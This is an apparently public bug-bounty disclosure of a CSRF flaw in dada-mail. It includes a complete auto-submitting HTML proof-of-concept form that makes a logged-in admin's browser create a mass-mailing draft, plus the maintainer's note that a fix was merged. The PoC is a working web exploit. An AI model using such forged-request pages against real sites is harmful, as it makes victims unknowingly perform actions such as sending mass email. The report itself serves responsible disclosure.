Cross-Site Request Forgery (CSRF) in justingit/dada-mail

Valid

Reported on

Sep 12th 2021


✍️ Description

Attacker able to Send any Mass mailing with CSRF attack.

In CSRF attacks it is necessary that a user logged into your application and just going to a malicious website and after that only with a redirection attacker can perform attack on unprotected endpoint, this means only with visiting a site a unwanted action will be perform without that user aware from that.

Or users with low level privilege can send a link to other users and admins with higher privilege and then their malicious request will be executed without that victim users and admins be aware about that.

🕵️‍♂️ Proof of Concept

1.First of all admin or user with right privileges already should be logged in any browser.

2.Open the PoC.html (it is auto-submit).

3.Here A mass mailing with Preheader aaa and content bbb will be send after the PoC.html file opened.

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://dadademo.com/cgi-bin/dada/mail.cgi" method="POST">
      <input type="hidden" name="list" value="demolist" />
      <input type="hidden" name="sched&#95;flavor" value="" />
      <input type="hidden" name="flavor" value="send&#95;email" />
      <input type="hidden" name="support&#95;files&#95;url" value="https&#58;&#47;&#47;dadademo&#46;com&#47;dada&#95;mail&#95;support&#95;files" />
      <input type="hidden" name="draft&#95;alert" value="0" />
      <input type="hidden" name="draft&#95;id" value="441" />
      <input type="hidden" name="save&#95;draft&#95;role" value="draft" />
      <input type="hidden" name="draft&#95;role" value="draft" />
      <input type="hidden" name="schedule&#95;html&#95;body&#95;checksum" value="" />
      <input type="hidden" name="feed&#95;url&#95;most&#95;recent&#95;entry" value="" />
      <input type="hidden" name="schedule&#95;type" value="single" />
      <input type="hidden" name="schedule&#95;single&#95;displaydatetime" value="" />
      <input type="hidden" name="schedule&#95;recurring&#95;displaydatetime&#95;start" value="" />
      <input type="hidden" name="schedule&#95;recurring&#95;displaydatetime&#95;end" value="" />
      <input type="hidden" name="schedule&#95;recurring&#95;display&#95;hms" value="00&#58;00" />
      <input type="hidden" name="schedule&#95;recurring&#95;days" value="1" />
      <input type="hidden" name="schedule&#95;recurring&#95;days" value="2" />
      <input type="hidden" name="schedule&#95;recurring&#95;days" value="3" />
      <input type="hidden" name="schedule&#95;recurring&#95;days" value="4" />
      <input type="hidden" name="schedule&#95;recurring&#95;days" value="5" />
      <input type="hidden" name="schedule&#95;recurring&#95;days" value="6" />
      <input type="hidden" name="schedule&#95;recurring&#95;days" value="7" />
      <input type="hidden" name="schedule&#95;recurring&#95;only&#95;mass&#95;mail&#95;if&#95;primary&#95;diff" value="1" />
      <input type="hidden" name="Reply&#45;To" value="" />
      <input type="hidden" name="X&#45;Priority" value="3" />
      <input type="hidden" name="Subject" value="&lt;&#33;&#45;&#45;&#32;tmpl&#95;var&#32;list&#95;settings&#46;list&#95;name&#32;&#45;&#45;&gt;&#32;Message" />
      <input type="hidden" name="X&#45;Preheader" value="aaa" />
      <input type="hidden" name="content&#95;from" value="content&#95;from&#95;textarea" />
      <input type="hidden" name="html&#95;message&#95;body" value="&lt;html&gt;&#13;&#10;&lt;head&gt;&#13;&#10;&#9;&lt;title&gt;&lt;&#47;title&gt;&#13;&#10;&lt;&#47;head&gt;&#13;&#10;&lt;body&gt;&#13;&#10;&lt;p&gt;aaa&lt;&#47;p&gt;&#13;&#10;&lt;&#47;body&gt;&#13;&#10;&lt;&#47;html&gt;&#13;&#10;" />
      <input type="hidden" name="url" value="" />
      <input type="hidden" name="crop&#95;html&#95;content&#95;selector&#95;type" value="id" />
      <input type="hidden" name="crop&#95;html&#95;content&#95;selector&#95;label" value="" />
      <input type="hidden" name="feed&#95;url" value="" />
      <input type="hidden" name="feed&#95;url&#95;content&#95;type" value="summary" />
      <input type="hidden" name="feed&#95;url&#95;max&#95;entries" value="5" />
      <input type="hidden" name="feed&#95;url&#95;pre&#95;html" value="" />
      <input type="hidden" name="feed&#95;url&#95;post&#95;html" value="" />
      <input type="hidden" name="text&#95;message&#95;body" value="" />
      <input type="hidden" name="plaintext&#95;url" value="" />
      <input type="hidden" name="plaintext&#95;content&#95;from" value="auto" />
      <input type="hidden" name="rich&#95;filemanager&#95;enabled" value="1" />
      <input type="hidden" name="rich&#95;filemanager&#95;url" value="https&#58;&#47;&#47;dadademo&#46;com&#47;dada&#95;mail&#95;support&#95;files&#47;RichFilemanager" />
      <input type="hidden" name="rich&#95;filemanager&#95;upload&#95;dir" value="&#47;home8&#47;dadademo&#47;public&#95;html&#47;dada&#95;mail&#95;support&#95;files&#47;file&#95;uploads" />
      <input type="hidden" name="rich&#95;filemanager&#95;upload&#95;url" value="https&#58;&#47;&#47;dadademo&#46;com&#47;dada&#95;mail&#95;support&#95;files&#47;file&#95;uploads" />
      <input type="hidden" name="SUPPORT&#95;FILES&#95;URL" value="https&#58;&#47;&#47;dadademo&#46;com&#47;dada&#95;mail&#95;support&#95;files" />
      <input type="hidden" name="attachment1" value="" />
      <input type="hidden" name="attachment2" value="" />
      <input type="hidden" name="attachment3" value="" />
      <input type="hidden" name="attachment4" value="" />
      <input type="hidden" name="attachment5" value="" />
      <input type="hidden" name="layout" value="default" />
      <input type="hidden" name="local&#95;archive&#95;options&#95;present" value="1" />
      <input type="hidden" name="archive&#95;message" value="1" />
      <input type="hidden" name="backdate&#95;datetime" value="2021&#45;09&#45;12&#32;22&#58;37&#58;41" />
      <input type="hidden" name="email&#46;operator" value="LIKE" />
      <input type="hidden" name="email&#46;value" value="" />
      <input type="hidden" name="subscriber&#46;timestamp&#46;rangestart" value="" />
      <input type="hidden" name="subscriber&#46;timestamp&#46;rangeend" value="" />
      <input type="hidden" name="mass&#95;mailing&#95;utm&#95;domains" value="" />
      <input type="hidden" name="mass&#95;mailing&#95;utm&#95;source" value="Pro&#32;Dada" />
      <input type="hidden" name="mass&#95;mailing&#95;utm&#95;medium" value="email" />
      <input type="hidden" name="mass&#95;mailing&#95;utm&#95;term" value="" />
      <input type="hidden" name="mass&#95;mailing&#95;utm&#95;content" value="" />
      <input type="hidden" name="mass&#95;mailing&#95;utm&#95;name" value="" />
      <input type="hidden" name="test&#95;recipient&#95;type" value="from&#95;textbox" />
      <input type="hidden" name="test&#95;recipients" value="" />
      <input type="hidden" name="process" value="save&#95;as&#95;draft" />
      <input type="hidden" name="json" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

This PoC can perform attack without that users noticed and Also PoC can send multiple request at same time that means attacker can Bruteforce all possible actions ( with using multiple Iframe )

💥 Impact

This vulnerability is capable of make medium damage on availability and integrity of system.

Fix

You should set a CSRF token for each user/form.

We have contacted a member of the justingit/dada-mail team and are waiting to hear back 2 months ago
Justin J validated this vulnerability 2 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Justin J
2 months ago

Maintainer


All CSFR vulnerabilities are fixed in the following branch, which will be merged in master soon: https://github.com/justingit/dada-mail/tree/features-csrf

Justin J confirmed that a fix has been merged on e9fc1c 2 months ago
Justin J has been awarded the fix bounty